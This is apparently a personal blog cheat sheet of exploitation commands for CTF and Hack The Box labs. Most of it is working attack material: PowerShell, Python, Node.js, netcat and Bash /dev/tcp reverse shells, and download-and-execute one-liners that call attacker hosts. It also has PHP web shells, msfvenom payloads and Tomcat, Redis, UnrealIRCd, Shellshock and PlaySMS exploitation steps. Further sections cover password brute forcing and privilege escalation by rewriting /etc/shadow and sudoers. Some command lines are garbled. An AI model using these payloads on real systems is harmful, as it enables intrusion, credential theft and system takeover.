Skip to main content

Exploitation

By 


CTF --> Pawnable.kr

1) Binary Exploitation Basics

2) Binary Exploit  

3) Online Hash Decrypter -- NTLM/WPA/PDF..

4) XSS Payloads 
Put a file using CURL

curl -v -X PUT -d '<?php system ($_GET[“cmd”]); ?>' http://10.10.10.10/test/shell.php 

Brute Force SSH:


patator ssh_login host=10.10.10.76 port=22 user=someone password=FILE0 0=probable-v2-top1575.txt persistent=0

https://github.com/lanjelot/patator.git
Brute Forcing id_rsa using JohnTheRipper:

sshng2john id_rsa
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
chmod +x id_rsa

ssh -i id_rsa bhanu@10.10.10.10 
Bruteforcing using Hashcat:
 hashcat --example-hashes    //Gives out all the hashes list, select the mode and use it after -m
cewl 10.10.10.46 > wordlist.txt  --> Create a Word list based 

          on the files/words/links available in the web page
Windows Reverse Shell

$client = New-Object System.Net.Sockets.TCPClient("10.10.14.6",9001);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

Windows Payload: metasploit 

msfvenom -a x86 --platform windows -p CMD="powershell \"IEX (New-Object Net.Webclient).DownloadString('http://SERVER/script.ps1')\"" -e x86/unicode_mixed lhost=10.10.10.74 lport=9001 -b '----------------------payload-------------' BufferRegister=EAX -f python 
Upload a Shell to the Target:

powershell.exe -exec bypass -Command “& {Import-Module .\script.ps1; Invoke-CMDLET | Out-File -Encoding ascii file.txt}


or 


powershell -nop -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://HOST/script.ps1’); Invoke-CMDLET | Out-File -Encoding ascii file.txt“

Example
Drupal Exploit
-> Exploit-DB ; also find modified in /root/Downloads/exploits/drupal < 7.58  < 8.3.9 < 8.4.6  < 8.5.1


1) Run the exploit

2) go to website.com/bhanu.php?cmd=whoami

3) http://wensite.com/bhanu.php?cmd=echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.33:8001/rev.ps1') | powershell -noprofile -                       //Get Reverse Shell 
Brute Forcing ZIP Files:

fcrackzip -D -p /usr/share/wordlists/rockyou.txt something.zip
Working with Python Console 

import os
os.popen("whoami").read()

os.popen("find /etc | grep iptables").read()    //Check for accessible ports to connect via reverse shell
os.popen("base64 -w 0 /etc/iptables/rules.v4").read()      //Read Files as Base64; Check the accessible ports 

os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.0.0.1 1234 >/tmp/f").read()     //UDP Reverse Shell

nc -u -nvlp 1234   //Get a UDP Shell 
Exploiting Apache Tomcat:

http://IP_ADDRESS:8080/manager/html/

login with default credentials --> tomcat/tomcat

upload a war file as a reverse shell

For Windows: msfvenom -p windows/shell/reverse_tcp LHOST=10.11.0.48 LPORT=9001 -f war -o tomcat.war


For Linux: msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.11.0.48 LPORT=9001 -f war -o tom.war


Extract the war file --> look for some_random_name.jsp

nc -nvlp 9001

http://IP_ADDRESS:8080/tom/some_random_name.jsp

Get you reverse shell on nc :) 


Method-II

#Creating a reverse shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.10.10 LPORT=9001 -f war > shell.war

#Uploading shell using curl
curl -u 'tomcat':'PASSWORD' -T shell.war 'http://10.10.10.10:8080/manager/text/deploy?path=/shells'

#List files
curl -u 'tomcat':'PASSWORD' http://10.10.10.10:8080/manager/text/list

#Running the Reverse Shell
curl -u 'tomcat':'PASSWORD' http://10.10.10.10:8080/shells/


Method -III

tomcatWarDeployer.py -U tomcat -P tomcat -H KALI_IP -p PORT 10.10.10.10:8080



Tomcat Exploit < 9.0.31 
Path Traversal: https://10.10.10.10/manager/status/..;/html


Kibana Local File Inclusion < 6.4.3 & 5.6.13
upload a Node JS Reverse shell via elastic search or any other method, then 

Node JS Reverse Shell:
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js


https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/  
Exploiting Web.config: You need to add the following code at the end of web.config file and upload it into the server and get a reverse shell using it. reverse shell should be in winrevshell.ps1 file; a file sharing server should be turned on as well. 

<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://10.10.14.6:8001/winrevshell.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%> 
Exploiting MongoDB - HTB Node

find creds in app.js 
example: mongodb://usernameLpassword@localhost:port/.......=DEFAULT&authSource=databasename';


mongo -p -u username DBName

db.TableName.insert({"cmd" : "cp /bin/dash /tmp/file; chmod 6755 /bin/dash;chmod u+s /tmp/file"})           //Creating SUID 
db.TableName.find() 

/tmp/ippsec -p                   //run with privs

Exploiting Haraka < 2.8.9

Exploit --> Available Here

Change the port number if required on line 123

 ./haraka.py -c "python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.10.10.10\",9001));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'" -t penelope@redcross.htb -f penelope@redcross.htb -m redcross
htb -m redcrossn/sh\",\"-i\"]);'" -t penelope@redcross.htb -f penelope@redcross.h


Exploiting a CGI-bin Vulnerability : Shell Shock:

curl -H "user-agent: () { :; }; echo; echo; /bin/bash -i >& /dev/tcp/10.10.14.5/9001 0>&1 " http://10.10.10.56:80/cgi-bin/user.sh
  
Exploiting Redis sever

ssh-keygen
(echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > foo.txt
redis-cli -h 10.10.10.10 -p 6379
redis-cli -h 10.10.10.10 -p 6379 flushall
cat foo.txt | redis-cli -h 10.10.10.160 -p 6379 -x set crackit
redis-cli -h 10.10.10.10 -p 6379 

config get dir 
config set dir /var/lib/redis/.ssh/
config set dbfilename “authorized_keys”
save
Exploiting UnRealIRCd  

ncat 10.10.10.117 8067         /IRC channel opens
PASS somepass
NICK somenickname
USER username hostname servername :realname    /we can see IRC server talking tp us 

echo "AB; bash -c 'bash -i >& /dev/tcp/10.10.14.4/9002 0>&1'" | nc 10.10.10.117 8067            /in a new terminal

ncat -lvnp 9001             /shell opens
pspy for Solaris
#!/bin/bash

# Loop by line
IFS=$'\n'

old_process=$(ps -eo args -o pid)

while true; do
        new_process=$(ps -eo args -o pid)
        diff <(echo "$old_process") <(echo "$new_process") | grep [\<\>] | grep -v "ps -eo args"
        sleep .1
        old_process=$new_process
done
Exploiting PlaySMS 1.4 - Exploit 

Get login creds and login 

go to http://192.168.227.140/SecreTSMSgatwayLogin/index.php?app=main&inc=feature_sendfromfile&op=list 

Create the payload: Save the payload as exploit & upload it 
<?php system('echo "bash -i >& /dev/tcp/192.168.227.135/443 0>&1"> /tmp/shell'); ?>,2,3


edit the exploit & Upload The exploit again
<?php system('chmod +x /tmp/shell'); ?>,2,3

edit the exploit & Upload The exploit again
<?php system('bash -c /tmp/shell'); ?>,2,3


Get the shell on nc -nvlp 443
Python Functions for Pentest:

scandir("/home")

file_get_contents("/root/root.txt")

file_put_contents("/root/root.txt","Enter whatever you want to paste in rootl.txt - you can even append data to it by adding FILE_APPEND",FILE_APPEND)
 
wpscan -u http://website.com --enumerate t --enumerate p  

     --> enumerate username and password in Wordpress Site

wpscan u http://10.10.10.46 --username UserName --wordlist /root/Desktop/list.txt

                    --> bruteforce a wps username with passwords list
use exploit/unix/webapp/wp_admin_shell_upload 

-->this can be used to upload a shell when you know username and password
if Find has SETUID; this command changes the root password to 1234

find . -exec sed -Ei ‘s/^(root\:)\*(.*)/\1\$6\$ZbvneNDSEXXO4pk1\$DmvtdGOHZA8mbpVih5xtHrBcKk8VxZ0rXwLEK2M1iciGvM6qHXfuSY5YosPHj3Zv063JUX2p1TQqya4k1Azjx0\2/’ /etc/shadow \;





su root 
1234

 
SeImpersonatePrivilege or SeCreateGlobalPrivilege Enabled Exploit

JUICY Potato Exploit 
 
64-bit   x86 Version   Get CLSID

jp86.exe -l 1336 -p c:\windows\system32\cmd.exe -t * -c {6d18ad12-bde3-4393-b311-099c346e6df9} 

Worked for Windows 7 Professional --> 
{6d18ad12-bde3-4393-b311-099c346e6df9} 
SeLoadDriverPrivilege Enabled


need a driver, download it on the target machine Capecom.sys 

Download the exploit https://github.com/TarlogicSecurity/EoPLoadDriver/ & Execute it 

https://github.com/tandasat/ExploitCapcom  --> Download the exploit 

creae a file with a reverseshell 
nc.exe 10.10.10.10 9001 -e cmd.exe > shel.bat

.\EOPLOADDRIVER.exe System\CurrentControlSet\MyService Capcom.sys

.\ExploitCapcom 

If Perl got Root Permissions:

sudo /usr/bin/perl -e 'exec "/bin/sh"'
Get Root Using Openssl which got capabilities: Read root files

getcap openssl     /This should be "ep"

openssl enc -in "/etc/passwd" 

openssl enc -in "/root/root.txt"


Getting a shell using Openssl

./openssl enc -in /etc/sudoers > sudoers

vi sudoers                      /add the below line in sudoers file. after root all(all) all
Username  ALL=(ALL)  ALL    

cat ./sudoers | ./openssl enc -out /etc/sudoers

SSH: no matching key exchange method found:

ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 sunny@10.10.10.76 -p22022
Labels:

Comments

Post a Comment

Popular posts from this blog

SQL DB & SQL Injection Pentest Cheat Sheet

By
1) MSSQL Injection Cheat Sheet | pentestmonkey 2) xp_cmdshell | Red Team tales 3) PentesterMonkey SQL Injection Cheatsheet Use dbeaver for GUI Access 4) SQL Injection Explanation | Graceful Security Common Ports Microsoft SQL: 1433/TCP (default listener) 1434/UDP (browser service) 4022/TCP (service broker) 5022/TCP (AlwaysOn High Availability default) 135/TCP (Transaction SQL Debugger) 2383/TCP (Analysis Services) 2382/TCP (SQL Server Browser Service) 500,4500/UDP (IPSec) 137-138/UDP (NetBios / CIFS) 139/TCP (NetBios CIFS) 445/TCP (CIFS) Oracle SQL: 1521/TCP 1630/TCP 3938/HTTP MongoDB : 27017,27018,27019/TCP PostgreSQL: 8432/TCP MySQL: 3306/TCP SQL DB Enum with nmap: nmap -p 1433 —script ms-sql-info —script-args mssql.instance-port=1433 IP_ADDRESS nmap -Pn -n -sS —script=ms-sql-xp-cmdshell.nse IP_ADDRESS -p1433 —script-args mssql.username=sa,mssql.password=password,ms-sql-xp-cmdshell.cmd="net user bhanu bhanu123 /add" nmap -Pn -n -sS —script=ms-sql-xp-cmds
8 comments
Read more

Windows Priv Escallation

By
1.     Windows Privilege Escalation Commands  _ new 2.     Transferring Files to Windows 3.    Priv Esc Commands 4.    Priv Esc Guide  5.    Payload All the Things --> great Coverage 6.    WinRM -- Windows Priv Esc    7. Newb Guide - Windows Pentest    8. Kerberos Attacks Explained     9. How to Attack Kerberos 101    Use PowerSploit/PrivEsc/Powerup.ps1 to find some potential info check for Non-windows processes in windows using netstat Step 1: Check net user and admin and user rights Step 2: Check if we have access of powershell if yes then run powerup.ps1,sherlock.ps1 and JAWS.ps1. Step 3: Try to get Meterpreter. Step 4: Load mimikatz ,try bypass UAC , check SAM SYSTEM etc. Step 5: check for weird programs and registry. Step 6: If the box is Domain Controller - Enum - Enum SMB Users/Ldap Users/ Blood Hound - GUI AD Enum & Kerberos Enum - Bruteforce   Atacking AD with LDAP & kerberos      Step 7: Got Creds - try psexec.py or crackm
1 comment
Read more

Relay Attacks

By
Hash Hashcat Attack method LM 3000 crack/pass the hash NTLM/NTHash 1000 crack/pass the hash NTLMv1/Net-NTLMv1 5500 crack/relay attack NTLMv2/Net-NTLMv2 5600 crack/relay attack Abusing ADIDNS to Send traffic to the target #Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes Import-Module ./ Powermad.ps1 PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose #assign permissions to the ADIDNS Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose Capturing Hashes using responder and cracking hashes #Find the interface of the IP (see via route table) ip route get 10.10.10.10 #start responder sudo proxychains responder -I tun0 -v #Start responder with WPAD Enabled and try to download NTLM hashes if any found python3 Responder.py -I ens160 -wFb -v --lm --disable-ess #Crack the hashes using hashcat hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/
3 comments
Read more